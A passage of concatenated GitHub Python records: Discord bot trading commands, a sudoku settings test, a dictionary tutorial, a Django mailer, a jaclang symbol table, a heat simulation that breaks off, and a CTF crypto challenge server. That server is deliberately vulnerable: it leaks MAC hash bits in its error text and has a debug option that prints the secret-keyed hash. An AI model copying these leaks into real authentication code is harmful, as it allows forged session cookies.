self.reply(embed=embed)\n\n async with conn.transaction():\n await self.user_data.remove_item(item.id, self.amount, conn)\n # We store username, to avoid fetching the user from Discord's\n # API just to get the username every time someone wants to view\n # the trades. (we don't store members data in bot's cache)\n query = \"\"\"\n INSERT INTO store\n (guild_id, user_id, username, item_id, amount, price)\n VALUES ($1, $2, $3, $4, $5, $6)\n RETURNING id;\n \"\"\"\n trade_id = await conn.fetchval(\n query,\n self.guild.id,\n self.author.id,\n self.author.name,\n item.id,\n self.amount,\n total_price\n )\n await self.release()\n\n embed = embed_util.success_embed(\n title=\"Trade offer is successfully created!\",\n text=(\n \"All set! The trade offer is up! 
\\N{THUMBS UP SIGN}\\n\"\n f\"You have put **{self.amount}x {item.full_name}** for sale at a price of \"\n f\"**{total_price}** {self.client.gold_emoji} for this server members!\\n\\n\"\n \"\\N{BUSTS IN SILHOUETTE} If you know the person you are selling your items to, \"\n f\"they can use this command to buy your items: **/trades accept {trade_id}**\\n\"\n \"\\N{WASTEBASKET} If you want to cancel this trade offer use: \"\n f\"**/trades delete {trade_id}**\"\n ),\n cmd=self\n )\n await self.reply(embed=embed)\n\n\nclass TradesAcceptCommand(\n TradesCommand,\n name=\"accept\",\n description=\"\\N{HANDSHAKE} Accepts someone else's trade offer\",\n parent=TradesCommand\n):\n \"\"\"\n This command accepts a trade offer and purchases the listed items from the other player.\n You can only purchase items that are listed in the current Discord server you are in.
        \n \\N{ELECTRIC LIGHT BULB} To create a trade offer in this server, use the\n **/trades create** command.
        \n You can't accept your own trades, but you can delete them with the **/trades delete** command.\n \"\"\"\n id: int = discord.app.Option(\n description=\"Trade ID of the trade to accept\",\n min=1,\n max=2147483647 # PostgreSQL's max int value\n )\n\n async def reject_for_not_found(self):\n embed = embed_util.error_embed(\n title=\"Trade not found!\",\n text=(\n f\"I could not find a trade with **ID: {self.id}**! \\N{CONFUSED FACE}\\n\"\n \"This trade might already be accepted by someone else or deleted by the \"\n \"trader itself. View all the available trades with the **/trades list** \"\n \"command. \\N{CLIPBOARD}\"\n ),\n cmd=self\n )\n if not self.interaction.response.is_done():\n await self.reply(embed=embed)\n else:\n await self.edit(embed=embed, view=None)\n\n async def callback(self):\n async with self.acquire() as conn:\n query = \"SELECT * FROM store WHERE id = $1 AND guild_id = $2;\"\n trade_data = await conn.fetchrow(query, self.id, self.guild.id)\n\n if not trade_data:\n return await self.reject_for_not_found()\n\n if trade_data['user_id'] == self.author.id:\n embed = embed_util.error_embed(\n title=\"You can't trade with yourself!\",\n text=(\n \"\\N{WASTEBASKET} If you want to cancel this trade, use: \"\n f\"**/trades delete {self.id}**\"\n ),\n cmd=self\n )\n return await self.reply(embed=embed)\n\n item = self.items.find_item_by_id(trade_data['item_id'])\n amount, price = trade_data['amount'], trade_data['price']\n\n if item.level > self.user_data.level:\n embed = embed_util.error_embed(\n title=\"\\N{LOCK} Insufficient experience level!\",\n text=(\n f\"Sorry, you can't buy **{item.full_name}** just yet! \"\n \"What are you planning to do with an item, that you can't even use yet? \"\n \"I'm just curious... \\N{THINKING FACE}\"\n ),\n footer=f\"This item is going to be unlocked at experience level {item.level}.\",\n cmd=self\n )\n return await self.reply(embed=embed)\n\n try:\n seller_member = await self.guild.fetch_member(trade_data['user_id'])\n except discord.HTTPException as e:\n if e.status != 404:\n raise e\n\n async with self.acquire() as conn:\n query = \"DELETE FROM store WHERE id = $1;\"\n await conn.execute(query, self.id)\n\n embed = embed_util.error_embed(\n title=\"Oops, the trader has vanished!\",\n text=(\n \"Looks like this trader has left this cool server, so their trade isn't \"\n \"available anymore. Sorry! 
\\N{CRYING FACE}\"\n ),\n footer=\"Let's hope that they will join back later\",\n cmd=self\n )\n return await self.reply(embed=embed)\n\n embed = embed_util.prompt_embed(\n title=\"Do you accept this trade offer?\",\n text=\"Are you sure that you want to buy these items from this user?\",\n cmd=self\n )\n embed.add_field(\n name=\"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{EAR OF RICE} Seller\",\n value=seller_member.mention\n )\n embed.add_field(name=\"\\N{LABEL} Item\", value=f\"{amount}x {item.full_name}\")\n embed.add_field(name=\"\\N{MONEY BAG} Total price\", value=f\"{price} {self.client.gold_emoji}\")\n\n confirm = await views.ConfirmPromptView(\n self,\n initial_embed=embed,\n emoji=self.client.gold_emoji,\n label=\"Accept trade offer\",\n deny_label=\"Deny trade offer\"\n ).prompt()\n\n if not confirm:\n return\n\n conn = await self.acquire()\n # Trade might already be deleted by now\n query = \"SELECT * FROM store WHERE id = $1;\"\n trade_data = await conn.fetchrow(query, self.id)\n\n if not trade_data:\n await self.release()\n return await self.reject_for_not_found()\n\n user_data = await self.users.get_user(self.author.id, conn=conn)\n trade_user_data = await self.users.get_user(trade_data['user_id'], conn=conn)\n\n if user_data.gold < price:\n await self.release()\n return await self.edit(embed=embed_util.no_money_embed(self, price), view=None)\n\n async with conn.transaction():\n query = \"DELETE FROM store WHERE id = $1;\"\n await conn.execute(query, self.id)\n await user_data.give_item(item.id, amount, conn)\n user_data.gold -= price\n trade_user_data.gold += price\n await self.users.update_user(user_data, conn=conn)\n await self.users.update_user(trade_user_data, conn=conn)\n await self.release()\n\n embed = embed_util.success_embed(\n title=\"Successfully bought items!\",\n text=(\n f\"You bought **{amount}x {item.full_name}** from {seller_member.mention} for \"\n f\"**{price}** {self.client.gold_emoji}\\n\"\n \"What a great trade you both just made! \\N{HANDSHAKE}\"\n ),\n cmd=self\n )\n await self.edit(embed=embed, view=None)\n\n if not trade_user_data.notifications.is_enabled(UserNotifications.TRADE_ACCEPTED):\n return\n\n embed = embed_util.success_embed(\n title=\"Congratulations! You just made a sale!\",\n text=(\n f\"Hey boss! I only came to say that {self.author.mention} just accepted your trade \"\n f\"offer and bought your **{amount}x {item.full_name}** for **{price}** \"\n f\"{self.client.gold_emoji}\"\n ),\n cmd=self,\n private=True\n )\n # User might have direct messages disabled\n with suppress(discord.HTTPException):\n await seller_member.send(embed=embed)\n\n\nclass TradesDeleteCommand(\n TradesCommand,\n name=\"delete\",\n description=\"\\N{WASTEBASKET} Cancels your trade offer\",\n parent=TradesCommand\n):\n \"\"\"\n This command is used to cancel a trade offer. You can only cancel your own trade offers.\n Canceling a trade offer will return the items to your inventory.\n \"\"\"\n id: int = discord.app.Option(\n description=\"Trade ID of the trade to delete\",\n min=1,\n max=2147483647 # PostgreSQL's max int value\n )\n\n async def callback(self):\n conn = await self.acquire()\n # It is fine if they delete their own trades from other guilds\n query = \"SELECT * FROM store WHERE id = $1 AND user_id = $2;\"\n trade_data = await conn.fetchrow(query, self.id, self.author.id)\n\n if not trade_data:\n await self.release()\n embed = embed_util.error_embed(\n title=\"Trade offer not found!\",\n text=(\n f\"Hmm... I could not find your trade **ID: {self.id}**! 
You might have \"\n \"provided wrong ID or this trade that does not exist anymore. \\N{THINKING FACE}\"\n \"\\nCheck your created trades in this server with the **/trades list** command.\"\n ),\n cmd=self\n )\n return await self.reply(embed=embed)\n\n async with conn.transaction():\n query = \"DELETE FROM store WHERE id = $1;\"\n await conn.execute(query, self.id)\n item_id, amount = trade_data['item_id'], trade_data['amount']\n await self.user_data.give_item(item_id, amount, conn)\n await self.release()\n\n item = self.items.find_item_by_id(trade_data['item_id'])\n embed = embed_util.success_embed(\n title=\"Trade offer canceled!\",\n text=(\n f\"\\N{WASTEBASKET} Okay, I removed your trade offer: **{trade_data['amount']}x \"\n f\"{item.full_name} for {trade_data['price']} {self.client.gold_emoji}**\"\n ),\n footer=\"These items are now moved back to your /inventory\",\n cmd=self\n )\n await self.reply(embed=embed)\n\n\ndef setup(client) -> list:\n return [ShopCollection(client)]\n","repo_name":"fuzzysearch404/discord-farm","sub_path":"bot/commands/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":43145,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"72265089816","text":"'''\nCreated on Jul 5, 2013\n\n@author: Jimena Terceros\n'''\nimport unittest\nimport os\n\nfrom sudoku.settings.exceptions.InvalidXMLSettingsException import InvalidXMLSettingsException\nfrom sudoku.settings.exceptions.FileNotFoundException import FileNotFoundException\nfrom sudoku.settings.SettingsReader import SettingsReader\nfrom sudoku.settings.Level import Level\n\nclass TestSettingsReader(unittest.TestCase):\n\n def setUp(self):\n self.notExistFileName = \"settings2.xml\"\n\n self.createValidXMLConfigFile()\n self.createInvalidXMLConfigFile()\n self.createCorruptedXMlConfigFile()\n \n def tearDown(self):\n os.remove(self.fileName)\n os.remove(self.invaliFileName)\n os.remove(self.corruptedFileName)\n \n def createCorruptedXMlConfigFile(self):\n self.corruptedFileName = \"corruptedSettings.xml\"\n \n file = open(self.corruptedFileName, \"w\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.close()\n \n def createInvalidXMLConfigFile(self):\n self.invaliFileName = \"invalidSettings.xml\"\n \n file = open(self.invaliFileName, \"w\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.close()\n \n def createValidXMLConfigFile(self):\n self.fileName = \"settings.xml\"\n self.outputType = \"file\"\n self.algorithmName = \"Peter Norving\"\n self.defaultLevel = \"Level 2\"\n self.levels = [Level(\"Level 1\", 5, 10), Level(\"Level 2\", 11, 20), Level(\"Level 3\", 21, 30)]\n self.path = \"c:\\\\test\"\n \n file = open(self.fileName, \"w\")\n file.write(\"\\n\")\n file.write(\"file\\n\")\n file.write(\"c:\\\\test\\n\")\n file.write(\"Peter Norving\\n\")\n file.write(\"Level 2\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.close()\n\n def test_Given_a_valid_xml_file_then_read_output_type_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n outputType = settings.getOutputType()\n expectedOutputType = self.outputType\n self.assertEqual(expectedOutputType, outputType)\n \n def test_Given_a_valid_xml_file_then_read_path_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n path = settings.getPath()\n expectedPath = self.path\n self.assertEqual(expectedPath, path)\n \n def 
test_Given_a_valid_xml_file_then_read_default_algorithm_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n algorithmName = settings.getAlgorithmName()\n expectedAlgorithmName = self.algorithmName\n self.assertEqual(expectedAlgorithmName, algorithmName)\n \n def test_Given_a_valid_xml_file_then_read_default_level_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n defaultLevel = settings.getDefaultLevel()\n expectedDefaultLevel = self.defaultLevel\n self.assertEqual(expectedDefaultLevel, defaultLevel) \n \n def test_Given_a_valid_xml_file_then_read_dificult_levels_properly(self):\n reader = SettingsReader()\n settings = reader.read(self.fileName)\n levels = settings.getLevels()\n expectedlevels = self.levels\n self.assertListEqual(expectedlevels, levels)\n \n def test_Given_an_xmlconfig_without_OutputType_Value_then_the_default_value_should_be_used(self):\n reader = SettingsReader()\n settings = reader.read(self.invaliFileName)\n outputType = settings.getOutputType()\n expectedOutputType = settings.DEFAULT_OUTPUT_TYPE\n self.assertEqual(expectedOutputType, outputType)\n \n def test_Given_an_xmlconfig_without_AlgorithmName_Value_then_the_default_value_should_be_used(self):\n reader = SettingsReader()\n settings = reader.read(self.invaliFileName)\n algorithmName = settings.getAlgorithmName()\n expectedalgorithmName = settings.DEFAULT_ALGORITHM_NAME\n self.assertEqual(expectedalgorithmName, algorithmName)\n \n def test_Given_an_xmlconfig_without_DefaultLevel_Value_then_the_default_value_should_be_used(self):\n reader = SettingsReader()\n settings = reader.read(self.invaliFileName)\n defaultLevel = settings.getDefaultLevel()\n expectedDefaultLevel = settings.DEFAULT_LEVEL_NAME\n self.assertEqual(expectedDefaultLevel, defaultLevel)\n \n def test_Given_an_xmlconfig_without_levels_then_a_default_level_should_be_created(self):\n reader = SettingsReader()\n settings = reader.read(self.invaliFileName)\n levels = settings.getLevels()\n \n expectedSize = 1\n expectedLevelName = Level(settings.DEFAULT_LEVEL_NAME, settings.DEFAULT_MIN, settings.DEFAULT_MAX)\n self.assertEqual(expectedSize, len(levels))\n self.assertEqual(expectedLevelName, levels[0])\n\n def test_Given_a_bad_xml_file_then_verify_that_raise_an_exception(self):\n try:\n reader = SettingsReader()\n reader.read(self.corruptedFileName)\n self.fail(\"Didn't raise an expected exception.\")\n except InvalidXMLSettingsException:\n pass\n \n def test_if_the_xml_config_file_is_not_found_then_should_be_created_one_with_default_values(self):\n try:\n reader = SettingsReader()\n reader.read(\"Mytest.xml\")\n self.fail(\"Didn't raise an expected exception.\")\n except FileNotFoundException:\n pass\n \n def test_If_there_is_not_settings_file_the_should_create_default_settings_file(self):\n pass\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"pysudoku/sudoku","sub_path":"src/unitTests/settings/TestSettingsReader.py","file_name":"TestSettingsReader.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"9774200223","text":"# A dictionary is a collection of unordered, modifiable and paired (key: value) data type.\n# a dict can hold values as: lists, tuples and sets\nempty_dic = {}\ndct = {'key':'value', 'test':'testing', 'hey':'hello', 'booking':'book'}\nfull_dict = {\n 'list':['Alist', 'hey', 'test'],\n 'set':{'aSet', 'banana', 2},\n 'tuple':('AtuPle', 'eskimo', 
4)\n}\nprint(len(dct)) # prints the number of items in the dict\nprint(full_dict)\n\n# We can also create a dict inside a dict and organize it in such a way:\nperson = {\n 'first_name':'Nat',\n 'last_name':'Ir',\n 'age':25,\n 'profession':'Dev',\n 'is_married':'No',\n 'address': {\n 'street':'XYZ',\n 'ZIP':'1234'\n }\n}\nprint(person)\nprint(person['address']) # print value for spec key\nprint(person.get('age')) # this will be the correct way to utilize the above, if the address key is missing it'll result in an error\n\n# add key and value and add new value to existing key\nperson['pets'] = 'dog' # will add it to the bottom of the dict\nperson['skills'] = ['Linux', 'Aws', 'script']\nperson['skills'].append('python')\nprint(person)\n\n# to change a value in one of the keys\nperson['first_name'] = 'Nate'\n\n# checking for a key in a dict using the in operator\nprint('address' in person)\n\n# removing key and value \nperson.pop('last_name') # will pop the mentioned key\nlast = person.popitem() # will pop the last key and value\ndel person['is_married'] # this will delete the key and value\nprint(person)\nprint(last) # printing the popped item\n\n# copy dict\nperson_copy = person.copy()\n\n# clear a dict, will leave an empty dictionary\nperson.clear()\nprint(person)\n\n# delete a dict, the copied dict will remain\ndel person\nprint(person_copy)\n\n# creating a list of values\nval = person_copy.values()\nprint(val)","repo_name":"SirNatan1/python_training","sub_path":"Day8/Dictionaries.py","file_name":"Dictionaries.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25503437167","text":"from Crypto.Cipher import AES\nfrom Crypto import Random\nfrom hashlib import sha256\nfrom signal import alarm\nbs = 16\n\n\ndef pad(s):\n return s + (bs - len(s) % bs) * bytes((bs - len(s) % bs, ))\n\n\ndef unpad(s):\n return s[0:-s[-1]]\n\n\nclass cipher(object):\n def __init__(self, key):\n self.key = key\n\n def cbcPrimeEnc(self, key, iv, plain):\n cipher = AES.new(key, AES.MODE_CBC, iv)\n plain = pad(plain)\n# print(len(plain))\n# print(len(cipher.encrypt(plain)))\n return cipher.encrypt(plain)\n\n def cbcPrimeDec(self, key, iv, ciphertext):\n cipher = AES.new(key, AES.MODE_CBC, iv)\n plain = cipher.decrypt(ciphertext)\n return unpad(plain)\n\n def encrypt(self, plaintext):\n hash = sha256(mac_key + plaintext).digest()\n iv = Random.new().read(bs)\n# print( iv)\n ciphertext = iv + \\\n self.cbcPrimeEnc(authen_key, iv, hash) + \\\n self.cbcPrimeEnc(self.key, iv, plaintext)\n return ciphertext.hex()\n\n def decrypt(self, ciphertext):\n cookie = bytes.fromhex(ciphertext)\n iv = cookie[:bs]\n mac = cookie[bs:4 * bs]\n ciphertext = cookie[4 * bs:]\n plaintext = self.cbcPrimeDec(self.key, iv, ciphertext)\n print(plaintext)\n hash = self.cbcPrimeDec(authen_key, iv, mac)\n print(hash.hex()[-63:])\n print(sha256(mac_key + plaintext).digest().hex()[-63:])\n if sha256(mac_key + plaintext).digest().hex()[-63:] == hash.hex()[-63:]:\n return str(plaintext, 'ISO-8859-1')\n else:\n # return high 136 bits hex string\n raise Exception(\n sha256(mac_key + plaintext).digest().hex()[-64:-30], hash.hex()[-64:-30])\n\n\nencrypt_key = Random.new().read(bs)\nmac_key = Random.new().read(2 * bs)\nauthen_key = Random.new().read(bs)\nwith open('flag', 'r') as fp:\n flag = fp.readline()\nalarm(20)\nwhile True:\n c = cipher(encrypt_key)\n print('welcome to Fantasy Terram')\n choice = input(\"Please [r]egister or [l]ogin :>>\")\n if not choice:\n break\n 
if choice[0] == 'r':\n name = input('your name is:>>')\n name = bytes(name, 'ISO-8859-1') + b'user'\n if(len(name) > 1024):\n print(\"username too long!\")\n break\n else:\n print(\"Here is your cookie:\")\n print(c.encrypt(name))\n elif choice[0] == 'l':\n data = input('your cookie:>>')\n try:\n msg = c.decrypt(data)\n if msg[-4:] == 'user':\n print(\"Welcome %s!\" % msg[:-4])\n elif msg[-5:] == 'admin':\n print(flag)\n except Exception as e:\n print('Wrong MAC! ')\n print(\n 'the actual first 136 bits of sha256 and the supposed first 136 bits are:>>' + str(e))\n else:\n exit()\n\n # must be deleted!\n elif choice[0] == 'c':\n un = input('your username:>>')\n un = bytes(un, 'ISO-8859-1')\n print(sha256(mac_key + un).digest().hex())\n\n else:\n print(\"Unknown choice!\")\n break\n","repo_name":"st424204/ctf_practice","sub_path":"hitbxctf2018/crypt/cbc.py","file_name":"cbc.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"68"} +{"seq_id":"33476301324","text":"from django.core.mail import send_mail\nfrom django.conf import settings\n\n\ndef send_order_emails(model, version, mail_list):\n \"\"\"\n Sends emails to the customers who are on the waiting list.\n\n :param model: Name of the product model.\n :type model: str\n :param version: Product version.\n :type version: str\n :param mail_list: List of email addresses the notification will be sent to.\n :type mail_list: list\n :return: None\n \"\"\"\n message_text = f'Добрый день!\\n' \\\n f'Недавно вы интересовались ' \\\n f'нашим роботом модели {model}, версии {version}.\\n' \\\n 'Этот робот теперь в наличии. Если вам подходит' \\\n ' этот вариант - пожалуйста, свяжитесь с нами'\n\n send_mail(\n subject='Робот в наличии',\n message=message_text,\n from_email=settings.EMAIL_HOST_USER,\n recipient_list=mail_list,\n fail_silently=False\n )\n","repo_name":"mxstrv/r4c","sub_path":"orders/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"69924056218","text":"\"\"\"Jac Symbol Table.\"\"\"\nfrom __future__ import annotations\n\nfrom enum import Enum\nfrom typing import Optional, TYPE_CHECKING\n\n\nif TYPE_CHECKING:\n import jaclang.jac.absyntree as ast\n\n\nclass SymbolType(Enum):\n \"\"\"Symbol types.\"\"\"\n\n MODULE = \"module\"\n MOD_VAR = \"mod_var\"\n VAR = \"var\"\n IMM_VAR = \"immutable\"\n ABILITY = \"ability\"\n OBJECT_ARCH = \"object\"\n NODE_ARCH = \"node\"\n EDGE_ARCH = \"edge\"\n WALKER_ARCH = \"walker\"\n ENUM_ARCH = \"enum\"\n TEST = \"test\"\n TYPE = \"type\"\n IMPL = \"impl\"\n HAS_VAR = \"field\"\n METHOD = \"method\"\n CONSTRUCTOR = \"constructor\"\n ENUM_MEMBER = \"enum_member\"\n\n def __str__(self) -> str:\n \"\"\"Stringify.\"\"\"\n return self.value\n\n\nclass SymbolAccess(Enum):\n \"\"\"Symbol access levels.\"\"\"\n\n PRIVATE = \"private\"\n PUBLIC = \"public\"\n PROTECTED = \"protected\"\n\n def __str__(self) -> str:\n \"\"\"Stringify.\"\"\"\n return self.value\n\n\nclass Symbol:\n \"\"\"Symbol.\"\"\"\n\n def __init__(\n self,\n defn: ast.AstSymbolNode,\n access: SymbolAccess,\n typ: Optional[type] = None,\n ) -> None:\n \"\"\"Initialize.\"\"\"\n self.typ = typ\n self.defn: list[ast.AstSymbolNode] = [defn]\n defn.sym_link = self\n self.access = access\n\n @property\n def decl(self) -> ast.AstSymbolNode:\n \"\"\"Get decl.\"\"\"\n return self.defn[0]\n\n @property\n def 
sym_name(self) -> str:\n \"\"\"Get name.\"\"\"\n return self.decl.sym_name\n\n @property\n def sym_type(self) -> SymbolType:\n \"\"\"Get sym_type.\"\"\"\n return self.decl.sym_type\n\n def add_defn(self, node: ast.AstSymbolNode) -> None:\n \"\"\"Add defn.\"\"\"\n self.defn.append(node)\n node.sym_link = self\n\n def __repr__(self) -> str:\n \"\"\"Repr.\"\"\"\n return (\n f\"Symbol({self.sym_name}, {self.sym_type}, {self.access}, \"\n f\"{self.typ}, {self.defn})\"\n )\n\n\nclass SymbolTable:\n \"\"\"Symbol Table.\"\"\"\n\n def __init__(\n self, name: str, owner: ast.AstNode, parent: Optional[SymbolTable] = None\n ) -> None:\n \"\"\"Initialize.\"\"\"\n self.name = name\n self.owner = owner\n self.parent = parent if parent else self\n self.kid: list[SymbolTable] = []\n self.tab: dict[str, Symbol] = {}\n self.uses: list[ast.AstSymbolNode] = []\n\n def has_parent(self) -> bool:\n \"\"\"Check if has parent.\"\"\"\n return self.parent != self\n\n def get_parent(self) -> SymbolTable:\n \"\"\"Get parent.\"\"\"\n if self.parent == self:\n raise Exception(\"No parent\")\n return self.parent\n\n def lookup(self, name: str, deep: bool = True) -> Optional[Symbol]:\n \"\"\"Lookup a variable in the symbol table.\"\"\"\n if name in self.tab:\n return self.tab[name]\n if deep and self.has_parent():\n return self.get_parent().lookup(name, deep)\n return None\n\n def insert(\n self,\n node: ast.AstSymbolNode,\n access_spec: Optional[ast.AstAccessNode] = None,\n single: bool = False,\n ) -> Optional[ast.AstNode]:\n \"\"\"Set a variable in the symbol table.\n\n Returns original symbol as collision if single check fails, none otherwise.\n Also updates node.sym to create pointer to symbol.\n \"\"\"\n if single and node.sym_name in self.tab:\n return self.tab[node.sym_name].defn[-1]\n if node.sym_name not in self.tab:\n self.tab[node.sym_name] = Symbol(\n defn=node,\n access=access_spec.access_type if access_spec else SymbolAccess.PUBLIC,\n )\n\n def push_scope(self, name: str, key_node: ast.AstNode) -> SymbolTable:\n \"\"\"Push a new scope onto the symbol table.\"\"\"\n self.kid.append(SymbolTable(name, key_node, self))\n return self.kid[-1]\n\n def __repr__(self) -> str:\n \"\"\"Repr.\"\"\"\n out = f\"{self.name} {super().__repr__()}:\\n\"\n for k, v in self.tab.items():\n out += f\" {k}: {v}\\n\"\n return out\n\n\n__all__ = [\n \"Symbol\",\n \"SymbolTable\",\n \"SymbolType\",\n \"SymbolAccess\",\n]\n","repo_name":"Jaseci-Labs/jaclang","sub_path":"jaclang/jac/symtable.py","file_name":"symtable.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"21325668164","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport time\r\nimport pygmo as pg\r\nimport string\r\nimport re\r\nfrom heat import fun\r\nfrom tqdm import tqdm\r\n#from heat.fun import heatIn, qprl, qp, ql, qprp, moveFun1, neighFun, heatInAll, heatPoint, heat, yout\r\nimport copy\r\n\r\n# \r\nl = 0.1\r\nh = 1.5\r\nqh = 0\r\nqd = 0\r\nro = 760\r\nrhov = 1.1614\r\nlambd = 0.2\r\nT0p = 20\r\nT_set = 35\r\nNx = 5\r\nNy = 5\r\nstart_hour = 10\r\nend_hour = 16\r\nt_start = 3600 * start_hour\r\nt_end = 3600 * end_hour\r\ntmax = t_end - t_start\r\nqloss = 0\r\ne = 0.03\r\ncp = 1007\r\nmi = 184.6 * 10 ** (-7)\r\nk = 0.0272\r\ncv = 1007\r\nkinv = 15.52 * 10 ** (-6)\r\nm_dot = 0.03\r\nqd = 0\r\nqh = 0\r\ndx = l / (Nx - 1)\r\ndy = h / (Ny - 1)\r\ndd = 0.9\r\ndt = 0.1\r\nv = dy / dt\r\n# \r\n\r\n# \r\ndef Q_conv(n, alpha, dy, 
Tvz, T, p):\r\n\r\n Q_conv_out = alpha * dy * (Tvz[n, p] - T[0, n, p])\r\n\r\n return Q_conv_out\r\n\r\nrad = pd.read_csv('data/17_07_2019_Rad.txt', delimiter=';')\r\n\r\n\r\n\r\nrad_val = rad.values[:, 2].tolist()\r\n\r\ndef Q_rad(dy, dd, rad_val, p, dt):\r\n time1 = t_start + p * dt\r\n n_data = np.floor(time1/60)\r\n Q_rad_out = (rad_val[int(n_data)] + (rad_val[int(n_data+1)] - rad_val[int(n_data)])*(time1/60 - n_data)) * dy * dd\r\n\r\n Q_rad_out = 600\r\n return Q_rad_out\r\n\r\nTamb = pd.read_csv('data/17_07_2019_Tamb.txt', delimiter=';')\r\n\r\nTamb_val = Tamb.values[:, 2].tolist()\r\nTamb_val_clean = []\r\nfor i in range(len(Tamb_val)):\r\n Tamb_val_clean.append(re.sub('\\+', '', Tamb_val[i]))\r\n Tamb_val_clean[i] = Tamb_val_clean[i].replace(',', '.')\r\n Tamb_val_clean[i] = float(Tamb_val_clean[i])\r\n\r\n# plt.figure(figsize=(12, 6))\r\n# plt.subplot(121)\r\n# plt.plot(rad.values[:, 2].tolist(), 'r')\r\n# plt.xlabel('Time [min]')\r\n# plt.ylabel('Solar irradiance [W/m^2]')\r\n# plt.subplot(122)\r\n# plt.plot(Tamb_val_clean)\r\n# plt.xlabel('Time [min]')\r\n# plt.ylabel('Ambient temperature [°C]')\r\n# plt.show()\r\n# plt.savefig(\"Images/input.png\", format='png', dpi=300)\r\n\r\ndef T_ambient(Tamb_val_clean, p, dt):\r\n time1 = t_start + p * dt\r\n n_data = np.floor(time1/60)\r\n T_amb_out = Tamb_val_clean[int(n_data)] + (Tamb_val_clean[int(n_data+1)] - Tamb_val_clean[int(n_data)])*(time1/60 - n_data)\r\n\r\n T_amb_out = 20\r\n return T_amb_out\r\n\r\n\r\nQ_loss = 0\r\n# def ql(p, T, Nzv, Tvz, alpha):\r\n# return alpha * (Tvz[0:Nzv, p, 0] - T[0, :, p]) #+ 1000*0.91*0.95*1000\r\n#\r\n# def qprl(n, p, T, Tvz, alpha, neighField):\r\n# return alpha * np.dot(neighField[:, n], (T[0, :, p] - Tvz[0:Nzv, p, 0]))\r\n\r\n\r\n\r\ndef heatmap2d(arr: np.ndarray):\r\n plt.imshow(arr, cmap='viridis', interpolation='spline16')\r\n plt.colorbar()\r\n plt.show()\r\n# \r\n\r\n#MAIN FUNCTION\r\ndef heat_2d(x):\r\n Tvz_out = []\r\n alpha = fun.calcDN(h, e, cv, mi, k, v, kinv)\r\n fitness = 0\r\n c0 = 2000\r\n c1 = x[2] #61300\r\n Tpch = x[1]\r\n sigma = 0.5\r\n\r\n def c(T):\r\n return c0 + c1 * np.exp((-(T - Tpch) * (T - Tpch)) / sigma)\r\n\r\n dx = x[0] / (Nx - 1)\r\n dy = h / (Ny - 1)\r\n\r\n Tvz = np.zeros([Ny, int(tmax / dt) + 1])\r\n T = np.ones([Nx, Ny, int(tmax / dt) + 1])\r\n T[:, :, 0].fill(T0p)\r\n Tvz[:].fill(T_ambient(Tamb_val_clean, 0, dt))\r\n qp = 0\r\n Q_sum = np.zeros(int(tmax / dt))\r\n for p in tqdm(np.arange(0, int(tmax / dt), 1)):\r\n\r\n #air\r\n for i in range(Ny):\r\n Tvz[i, p + 1] = Tvz[i, p] - Q_conv(i, alpha, dy, Tvz, T, p) / (m_dot * cv)\r\n Q_sum[p] = Q_sum[p] + Q_conv(i, alpha, dy, Tvz, T, p)\r\n\r\n #corner points\r\n\r\n #top-left corner\r\n T[0, 0, p + 1] = T[0, 0, p] + (2 * dt * qh) / (ro * dy * c(T[0, 0, p])) + \\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[0, 0, p])) * (T[0, 1, p] - T[0, 0, p]) + (2 * lambd * dt) / (ro * dx ** 2 * c(T[0, 0, p])) * (T[1, 0, p] - T[0, 0, p]) \\\r\n + (2 * dt) / (ro * dy * dx * c(T[0, 0, p])) * (Q_conv(0, alpha, dy, Tvz, T, p) + Q_rad(dy, dd, rad_val, p, dt) / 2)\r\n\r\n #bottom-left corner\r\n T[0, -1, p + 1] = T[0, -1, p] + (2 * dt * qd) / (ro * dy * c(T[0, -1, p])) + \\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[0, -1, p])) * (T[0, -1 - 1, p] - T[0, -1, p]) + (2 * lambd * dt) / (ro * dx ** 2 * c(T[0, -1, p])) * (T[1, -1, p] - T[0, -1, p]) \\\r\n + (2 * dt) / (ro * dy * dx * c(T[0, -1, p])) * (Q_conv(-1, alpha, dy, Tvz, T, p) + Q_rad(dy, dd, rad_val, p, dt) / 2)\r\n\r\n #top-right corner\r\n T[-1, 0, p + 1] = T[-1, 0, p] + (2 * dt * qh) / (ro * dy * c(T[-1, 0, p])) + (2 * dt * qp) / (ro * dx * c(T[-1, 0, p])) + \\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[-1, 0, p])) * (T[-1, 1, p] - T[-1, 0, p]) + (2 * lambd * dt) / (ro * dx ** 2 * c(T[-1, 0, p])) * (T[-1-1, 0, p] - T[-1, 0, p])\r\n\r\n #bottom-right corner\r\n T[-1, -1, p + 1] = T[-1, -1, p] + (2 * dt * qd) / (ro * dy * c(T[-1, -1, p])) + (2 * dt * qp) / (ro * dx * c(T[-1, -1, p])) + \\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[-1, -1, 